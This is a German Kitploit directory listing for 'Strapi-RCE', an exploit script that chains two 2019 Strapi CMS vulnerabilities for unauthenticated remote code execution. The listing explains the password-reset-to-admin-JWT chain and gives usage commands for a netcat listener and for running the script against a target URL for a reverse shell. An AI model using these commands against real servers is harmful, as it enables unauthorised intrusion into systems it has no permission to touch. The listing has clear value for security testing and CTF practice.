Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Strapi-RCE — Exploit-Skript, das eine Mischung aus CVE-2019-18818 und CVE-2019-19609 für nicht authentifizierte Remote-Codeausführung in Strapi CMS zeigt. | Kitploit
Tools/GitHubGitHub/hackhoven/strapi-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubhackhoven/strapi-rce

Strapi-RCE

Exploit-Skript, das eine Mischung aus CVE-2019-18818 und CVE-2019-19609 für nicht authentifizierte Remote-Codeausführung in Strapi CMS zeigt.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Strapi-RCE

Exploit-Skript, das eine Mischung aus CVE-2019-18818 und CVE-2019-19609 für nicht authentifizierte Remote-Codeausführung in Strapi CMS demonstriert.

Exploit

Dieses Skript nutzt eine Sicherheitslücke in Strapi CMS Versionen 3.0.0-beta.17.4 und niedriger aus, die eine nicht authentifizierte Remote-Codeausführung ermöglicht.

Beschreibung

Der Exploit nutzt zunächst eine Schwachstelle im Passwort-Reset, um ein JSON Web Token (JWT) für einen administrativen Benutzer zu erhalten. Dieses Token wird dann verwendet, um eine schädliche Nutzlast an das Strapi CMS zu senden, die eine Reverse-Shell zurück zum Rechner des Angreifers auslöst.

Verwendung

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/Hackhoven/Strapi-RCE.git
    
  2. In das Verzeichnis wechseln

    root@kitploit:~
    cd Strapi-RCE/
    
  3. Netcat-Listener einrichten

    root@kitploit:~
    nc -nlvp <LPORT>
    
  4. Skript mit der Ziel-URL, der lokalen IP-Adresse und dem lokalen Port als Argumente ausführen

    root@kitploit:~
    python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
    

Haftungsausschluss

Dieses Skript ist ausschließlich für Bildungszwecke gedacht. Der Autor befürwortet oder unterstützt die Verwendung dieses Skripts für illegale oder unethische Aktivitäten nicht. Dieses Skript sollte nur in legalen Sicherheitsforschungs- oder CTF-Umgebungen verwendet werden. Verwendung auf eigene Gefahr.


Erstellt von Hackhoven

Tool herunterladen